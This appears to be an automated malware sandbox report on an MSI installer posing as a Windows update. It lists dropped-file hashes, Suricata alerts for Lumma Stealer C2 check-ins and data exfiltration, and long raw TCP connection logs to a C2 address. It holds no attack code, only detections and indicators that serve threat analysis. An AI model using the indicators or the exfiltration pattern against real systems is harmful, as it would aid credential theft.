                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):360001
                                            Entropy (8bit):5.362993660459459
                                            Encrypted:false
                                            SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauj:zTtbmkExhMJCIpEq
                                            MD5:BEB5FCA3F4AEF90EA6C2EC97AACDDD37
                                            SHA1:50E0400D6AA2A8CB2693B802E16FD971E48E25FB
                                            SHA-256:B3CB8D08DB4EBDEEFC4EFE5051D4C5B3A01D5A26FF9396D4D26CE1C99208D71D
                                            SHA-512:7AD575BE50FD5810AED71366BBC2C97A4BD72EC19DE9B79C61355EFEA91DACC6AF91CBC025FADF7FDEB46A0D2FD1496C2E768A8C470AEE876DF82CA02C9A6BF9
                                            Malicious:false
                                            Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):0.07157075893903267
                                            Encrypted:false
                                            SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOwLbY4Rx1BkgVky6lit/:2F0i8n0itFzDHFwLLRx1Qit/
                                            MD5:C8F48A459D6F7B052C042EB168B6CFD6
                                            SHA1:DA6154A79927F68BE22EA4D2224EBB1D94903C56
                                            SHA-256:1374B9ACAE8C4F046E88EC95ED64D5CC448389048AC372F912735E2F2C2820B4
                                            SHA-512:240B6BFA8EB1C70134253C01916595AC67CE8F6F8822A7A78F6DEC5C4056F7CD355160212B67C42A3720C9EC113CEE15F7E021A536FCCD1D68A74608E041DA70
                                            Malicious:false
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):1.270880513857938
                                            Encrypted:false
                                            SSDEEP:48:H0lusI+CFXJFT5VBGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:UlgdTjB12i6k2iKeRCIb2i6k2iZ
                                            MD5:C2089B017D8433A197038E986C820DB8
                                            SHA1:4A7C92F3260C0E4976AF6A2701627CD8D5E83AD8
                                            SHA-256:B6699ED1C2A3D467331B71A1CDEF09EA3197EF2D0E814CB588F7327D9AF1C836
                                            SHA-512:D69E7F0F1AE04F7CD3FE784A8E02F93BF6631373E0FEA90AFD132C6C032143F0D9CC68405EA2DBF00DBF9526DE163B47F7375A5062F811F585DFECB2C66CD863
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):1.270880513857938
                                            Encrypted:false
                                            SSDEEP:48:H0lusI+CFXJFT5VBGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:UlgdTjB12i6k2iKeRCIb2i6k2iZ
                                            MD5:C2089B017D8433A197038E986C820DB8
                                            SHA1:4A7C92F3260C0E4976AF6A2701627CD8D5E83AD8
                                            SHA-256:B6699ED1C2A3D467331B71A1CDEF09EA3197EF2D0E814CB588F7327D9AF1C836
                                            SHA-512:D69E7F0F1AE04F7CD3FE784A8E02F93BF6631373E0FEA90AFD132C6C032143F0D9CC68405EA2DBF00DBF9526DE163B47F7375A5062F811F585DFECB2C66CD863
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):1.589035988476092
                                            Encrypted:false
                                            SSDEEP:48:N8PhduRc06WXJSjT5XGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:whd1JjT512i6k2iKeRCIb2i6k2iZ
                                            MD5:F60B4F7B83B2F4507BB654331EBEFD8E
                                            SHA1:EE73209239BA6C0535B54591C17E3E230E97B86C
                                            SHA-256:7A98F6D4875DDD2F094ABF40654E212DD07EAE82A0327E06BD621E12FB1AF47D
                                            SHA-512:823DAA7A84EE2DF8E121E70DFACC51ED7F61B47575499AF5BA553B6B134CDD53D587E0B549A28D17D22D64F884E4A33BABADB3BA8321E92C08509742698008BC
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):1.270880513857938
                                            Encrypted:false
                                            SSDEEP:48:H0lusI+CFXJFT5VBGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:UlgdTjB12i6k2iKeRCIb2i6k2iZ
                                            MD5:C2089B017D8433A197038E986C820DB8
                                            SHA1:4A7C92F3260C0E4976AF6A2701627CD8D5E83AD8
                                            SHA-256:B6699ED1C2A3D467331B71A1CDEF09EA3197EF2D0E814CB588F7327D9AF1C836
                                            SHA-512:D69E7F0F1AE04F7CD3FE784A8E02F93BF6631373E0FEA90AFD132C6C032143F0D9CC68405EA2DBF00DBF9526DE163B47F7375A5062F811F585DFECB2C66CD863
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):73728
                                            Entropy (8bit):0.1459225699709233
                                            Encrypted:false
                                            SSDEEP:48:+SuT4dG2i6SkdG2i7dG2i6SkdG2iKVAEkrCyd73oN:bW2i6k2ig2i6k2iKeRCIU
                                            MD5:B43E3ED06B0BE373EB0A3236E221FDF4
                                            SHA1:21B04FE686E943BA7B465C5A6DD2770DD9CCDE13
                                            SHA-256:42CBB26F70FA361A73F3B1B5B343405F24DBCD59E812001150B939DA53A85F54
                                            SHA-512:5970BD5466D63667F9F8CC75848E0240FC245BAD0F0E051B8A4446B063267EDAA6CD15F49AE5D38B8293529FB6F7A8FCDD038D860DD147ECDF1E7A4C360DE35B
                                            Malicious:false
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):1.589035988476092
                                            Encrypted:false
                                            SSDEEP:48:N8PhduRc06WXJSjT5XGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:whd1JjT512i6k2iKeRCIb2i6k2iZ
                                            MD5:F60B4F7B83B2F4507BB654331EBEFD8E
                                            SHA1:EE73209239BA6C0535B54591C17E3E230E97B86C
                                            SHA-256:7A98F6D4875DDD2F094ABF40654E212DD07EAE82A0327E06BD621E12FB1AF47D
                                            SHA-512:823DAA7A84EE2DF8E121E70DFACC51ED7F61B47575499AF5BA553B6B134CDD53D587E0B549A28D17D22D64F884E4A33BABADB3BA8321E92C08509742698008BC
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {94DF14AB-36C1-4886-A54A-687987508C4D}, Number of Words: 2, Subject: UpdateMSwindows, Author: UpdateMSwindows, Name of Creating Application: UpdateMSwindows, Template: ;1033, Comments: This installer database contains the logic and data required to install UpdateMSwindows., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jul 23 16:58:05 2024, Last Saved Time/Date: Tue Jul 23 16:58:05 2024, Last Printed: Tue Jul 23 16:58:05 2024, Number of Pages: 450
                                            Entropy (8bit):7.3463477510001045
                                            TrID:
                                            • Windows SDK Setup Transform Script (63028/2) 47.91%
                                            • Microsoft Windows Installer (60509/1) 46.00%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                            File name:NB4EASbynx.msi
                                            File size:2'580'992 bytes
                                            MD5:3b48c90d4a283982ced898df9570894b
                                            SHA1:ed07663c40d54fff42af99c2969971a3493f1bf7
                                            SHA256:3ed535bbcd9d4980ec8bc60cd64804e9c9617b7d88723d3b05e6ad35821c3fe7
                                            SHA512:42171b68a91d1d99ca127fc3af875ac0ec961b85335d9bb809788cfe5951460fdc46d2a7df2b1cea54cf67e7631fcff82d7d158104266450f8e1989786d284b0
                                            SSDEEP:49152:6spIfhlTYEO+w2/64hnPRMB0WkuqES58NtvU:dIZlEN+wK6qRMB0WkufF
                                            TLSH:FCC5CF22B5D7C522D22F0377F929FE1A593D3E223B6345EB76E4395D2830CC16276A12
                                            File Content Preview:........................>...................(...................................g.......@.......................................................................................z...{...|...}...~..............................................................
                                            Icon Hash:2d2e3797b32b2b99
                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                            2024-07-25T09:54:05.626887+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49722443192.168.2.6188.114.96.3
                                            2024-07-25T09:54:09.471784+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49725443192.168.2.6188.114.96.3
                                            2024-07-25T09:54:07.393267+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49723443192.168.2.6188.114.96.3
                                            2024-07-25T09:54:08.625645+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49724443192.168.2.6188.114.96.3
                                            2024-07-25T09:54:13.980250+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49728443192.168.2.6188.114.96.3
                                            2024-07-25T09:54:06.322611+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49722443192.168.2.6188.114.96.3
                                            2024-07-25T09:54:08.313743+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49724443192.168.2.6188.114.96.3
                                            2024-07-25T09:53:23.686115+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971820.114.59.183192.168.2.6
                                            2024-07-25T09:54:06.823663+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49723443192.168.2.6188.114.96.3
                                            2024-07-25T09:54:17.088274+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49729443192.168.2.6188.114.96.3
                                            2024-07-25T09:54:10.700182+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49726443192.168.2.6188.114.96.3
                                            2024-07-25T09:54:18.413471+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49729443192.168.2.6188.114.96.3
                                            2024-07-25T09:52:45.853828+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971220.114.59.183192.168.2.6
                                            2024-07-25T09:54:12.517765+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49727443192.168.2.6188.114.96.3
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 25, 2024 09:54:05.145489931 CEST49722443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:05.145530939 CEST44349722188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:05.145720005 CEST49722443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:05.149346113 CEST49722443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:05.149358988 CEST44349722188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:05.626807928 CEST44349722188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:05.626887083 CEST49722443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:05.628542900 CEST49722443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:05.628552914 CEST44349722188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:05.628854990 CEST44349722188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:05.669594049 CEST49722443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:05.689519882 CEST49722443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:05.689519882 CEST49722443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:05.689685106 CEST44349722188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:06.322691917 CEST44349722188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:06.322963953 CEST44349722188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:06.323229074 CEST49722443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:06.341581106 CEST49722443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:06.341655016 CEST44349722188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:06.349873066 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:06.349945068 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:06.350028038 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:06.350346088 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:06.350363970 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:06.823503017 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:06.823662996 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:06.825062990 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:06.825073004 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:06.825364113 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:06.826787949 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:06.826809883 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:06.826867104 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.393302917 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.393385887 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.393486977 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.393517971 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.394984961 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.396840096 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.396889925 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.396908998 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.397739887 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.398745060 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.400722027 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.400768042 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.400790930 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.400799990 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.402560949 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.402641058 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.450768948 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.450797081 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.489228964 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.489367008 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.489504099 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.489684105 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.489705086 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.489718914 CEST49723443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.489726067 CEST44349723188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.679110050 CEST49724443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.679157972 CEST44349724188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:07.679263115 CEST49724443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.679655075 CEST49724443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:07.679662943 CEST44349724188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:08.313538074 CEST44349724188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:08.313743114 CEST49724443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:08.315043926 CEST49724443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:08.315054893 CEST44349724188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:08.315315008 CEST44349724188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:08.316690922 CEST49724443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:08.316802979 CEST49724443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:08.316832066 CEST44349724188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:08.625664949 CEST44349724188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:08.625768900 CEST44349724188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:08.626327991 CEST49724443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:08.626327991 CEST49724443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:08.935101032 CEST49724443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:08.935156107 CEST44349724188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:08.992230892 CEST49725443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:08.992275953 CEST44349725188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:08.992355108 CEST49725443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:08.992676020 CEST49725443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:08.992690086 CEST44349725188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:09.471635103 CEST44349725188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:09.471784115 CEST49725443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:09.473318100 CEST49725443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:09.473336935 CEST44349725188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:09.473712921 CEST44349725188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:09.474886894 CEST49725443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:09.475025892 CEST49725443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:09.475069046 CEST44349725188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:09.475131035 CEST49725443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:09.475138903 CEST44349725188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:09.930449963 CEST44349725188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:09.930556059 CEST44349725188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:09.930612087 CEST49725443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:09.930712938 CEST49725443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:09.930737019 CEST44349725188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:10.209610939 CEST49726443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:10.209662914 CEST44349726188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:10.209728956 CEST49726443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:10.210153103 CEST49726443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:10.210165977 CEST44349726188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:10.699995041 CEST44349726188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:10.700181961 CEST49726443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:10.701527119 CEST49726443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:10.701536894 CEST44349726188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:10.702126026 CEST44349726188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:10.703411102 CEST49726443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:10.703411102 CEST49726443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:10.703455925 CEST44349726188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:10.703511953 CEST49726443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:10.703522921 CEST44349726188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:11.556915045 CEST44349726188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:11.557034016 CEST44349726188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:11.557084084 CEST49726443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:11.559201002 CEST49726443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:11.559221983 CEST44349726188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:12.016990900 CEST49727443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:12.017026901 CEST44349727188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:12.017111063 CEST49727443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:12.017424107 CEST49727443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:12.017440081 CEST44349727188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:12.517630100 CEST44349727188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:12.517765045 CEST49727443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:12.519117117 CEST49727443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:12.519124985 CEST44349727188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:12.519367933 CEST44349727188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:12.520792007 CEST49727443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:12.520792007 CEST49727443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:12.520822048 CEST44349727188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:12.908871889 CEST44349727188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:12.909004927 CEST44349727188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:12.909080029 CEST49727443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:12.909183979 CEST49727443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:12.909203053 CEST44349727188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.402586937 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.402631998 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.402699947 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.403017044 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.403031111 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.980176926 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.980249882 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.987615108 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.987633944 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.987910032 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.992697001 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.993525982 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.993607998 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.993715048 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.993772984 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.993863106 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.993956089 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.995625973 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.995686054 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.995817900 CEST49728443192.168.2.6188.114.96.3
